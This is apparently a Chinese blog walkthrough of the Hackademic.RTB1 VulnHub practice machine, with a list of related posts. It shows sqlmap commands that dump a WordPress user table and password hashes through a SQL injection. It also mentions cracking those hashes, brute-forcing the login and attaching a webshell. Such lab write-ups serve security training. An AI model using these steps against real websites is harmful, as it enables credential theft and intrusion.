Hackademic.RTB1靶机复现

最新推荐文章于 2024-08-14 20:27:32 发布
最新推荐文章于 2024-08-14 20:27:32 发布
阅读量294 收藏 9
点赞数 5
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52956666/article/details/141114766
版权

查看靶机的MAC地址

使用nmap进行扫描

使用dirsearch进行目录扫描

网站登录

点击紫色字体

进一步进行目录扫描

进行拼接

拼接wp-content

拼接wp-includes

点击Got root

测试发现不存在SQL注入

点击posted in Uncategorized

测试发现存在SQL注入

测试数据库

python sqlmap.py -u "http://192.168.112.129/Hackademic_RTB1/?cat=1" --current-db --batch

库名为wordpress

测试表名

python sqlmap.py -u "http://192.168.112.129/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch

测试表中字段

python sqlmap.py -u "http://192.168.112.129/Hackademic_RTB1/?cat=1" -D wordpress --T wp_users --columns --batch

测试用户名

python sqlmap.py -u "http://192.168.112.129/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C user_login --dump --batch

测试密码

python sqlmap.py -u "http://192.168.112.129/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C user_pass --dump --batch

密码最后以为加密,使用MD5进行解密

进行用户名和密码的匹配

使用bursuite进行暴力破解

登录

查看phpinfo()

一句话木马连接蚁剑

CcHKer
关注
CTF之Hackademic RTB1 靶机渗透(Wordpress1.5 SQL注入)
afei001
08-22 622
练习环境     攻击机:kali     靶机Hackademic: RTB1     下载地址:https://download.vulnhub.com/hackademic/Hackademic.RTB1.zip      1.发现靶机,端口扫描 root@kali:~# netdiscover -r 100.100.100.0/16 _____________________________________________________________________________ .
Vulnhub系列靶机-Hackadmeic.RTB1
来日可期的博客
09-17 1762
刚才我们编辑的页面是在Plugins选项中的Plugin Editor下的hello.php。之前我们使用网页插件扫描网页的时候得知了网站使用的是WordPress,Wordpress上传的文件默认是存储在目录。并且在爆破目录的时候发现有一个wp-content目录,尝试进行访问。提交之后,需要获取到上传的路径,才可以触发反弹shell。,发现有SQL语句的报错信息,可以判断有SQL注入漏洞。扫描到了22端口和80端口,但是22端口的关闭的。在点击页面中能点击的链接的时候,发现点击。
[VulnHub靶机渗透] Hackademic: RTB1
人若无名,便可专心练剑
05-06 1141
靶机精讲之Hackademic: RTB1,vulnhub靶机,手动SQL注入,小试牛刀,内核提权。读遍牙签三万轴,欲来小邑试牛刀。
HACKADMIC-RTB1靶场(打靶流程)
qq_53733257的博客
10-29 526
HACKADMIC-RTB1靶场(打靶流程)
Hackademic.RTB1靶场实战【超详细】
weixin_68615160的博客
08-14 633
其中发现了一个路径 http://192.168.23.143/Hackademic_RTB1/wp-content/themes/starburst/style.css。可以看到 wp-content 位置,尝试将其修改为 wordpress的默认路径wp-admin,发现后台登录页面。挨个登录,登录GeorgeMiller发现插件里面能直接修改php代码,我们添加phpinfo,发现成功解析。排除一些其他 linux 操作系统,精确版本,尝试后发现 15285.c 可利用。查看当前权限,发现需要密码。
Vulnhub靶机 Hackademic.RTB1(渗透测试详解)
2301_78721909的博客
08-14 439
Vulnhub靶机 Hackademic.RTB1(渗透测试详解)
Hackademic.RTB1 靶机渗透测试流程
RemedyVI的博客
07-17 376
信息收集知道使用了wordpressCMS,通过SQL注入得到后台登录的users表,登录后台通过主题文件修改得到反弹shell,最后利用系统漏洞提权,总体来说靶机难度很简单。
Hackademic.RTB1靶场详细通关教程
weixin_59147806的博客
11-10 206
Hackademic.RTB1靶场详细通关教程,包括getshell、提权及flag获取。
[靶机渗透笔记] HACKADEMIC: RTB1
H4ppyD0g的博客
01-23 2235
靶机链接https://www.vulnhub.com/entry/hackademic-rtb1,17/ 确定靶机 扫描存活主机 sudo nmap -sP 192.168.200.129/24 扫描具体信息 sudo nmap 192.168.200.129/24 192.168.200.134开启22和80端口,为靶机的ip地址。 前期扫描 nmap扫描靶机开启的两个端口的版本信息 sudo nmap -p 22,80 -sV 192.168.200.134 针对80端口 nmap默认脚本扫
CTF之Hackademic RTB2 靶机渗透(万能密码 端口敲门 joomla1.5 SQL注入)
afei001
08-22 889
练习环境     攻击机:kali     靶机Hackademic: RTB2     下载地址:https://download.vulnhub.com/hackademic/Hackademic.RTB2.zip      1.发现靶机,端口扫描 root@kali:~# netdiscover -r 100.100.100.0/16 _____________________________________________________________________________ .
Vulnhub靶机系列:Hackademic: RTB1
汗的博客
03-30 2234
https://www.hackingarticles.in/hack-the-hackademic-rtb1-vm-boot-to-root/ 文章目录靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/hackademic-rtb1,17/ 靶机设置 利用知识及工具 信息收集并getshell 提权 总结 ...
NX二次开发-挂菜单栏.men和工具条.rtb及菜单中文汉字乱码问题
阿飞2018
11-08 1357
NX二次开发-挂菜单栏.men和工具条.rtb及菜单中文汉字乱码问题
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8493
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
多台三相逆变器并联(本模型为三台并联,市面上多为两台并联)matlab simulink仿真 功能:实现并联系统中各逆变器输出
最新发布
10-09
多台三相逆变器并联(本模型为三台并联,市面上多为两台并联)matlab simulink仿真。 功能:实现并联系统中各逆变器输出功率均分。 (有能力的话还可以研究下垂特性、功率指令以及静态功工作点三者之间的联系) 控制策略:VSG控制策略(同步机控制) 逆变器主电路:三相逆变器,LCL滤波电路,VSG控制模块。 VSG控制模块:定、转子方程,dq变,电压电流双闭环,预同步,pwm发生器。
Ringtones波点音乐-《Lightning Moment》.mp3
10-09
Ringtones波点音乐-《Lightning Moment》.mp3
onnx2onnx-0.3.1.tar.gz
10-09
onnx2onnx-0.3.1.tar
rtb10.4.mltbx下载
11-16
rtb10.4.mltbx是一个MATLAB工具箱文件,用于在MATLAB软件中进行实时竞价广告买卖(RTB)相关的数据处理和分析。要下载这个工具箱文件,您可以按照以下步骤操作: 首先,您需要通过互联网连接到MATLAB官方网站或者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值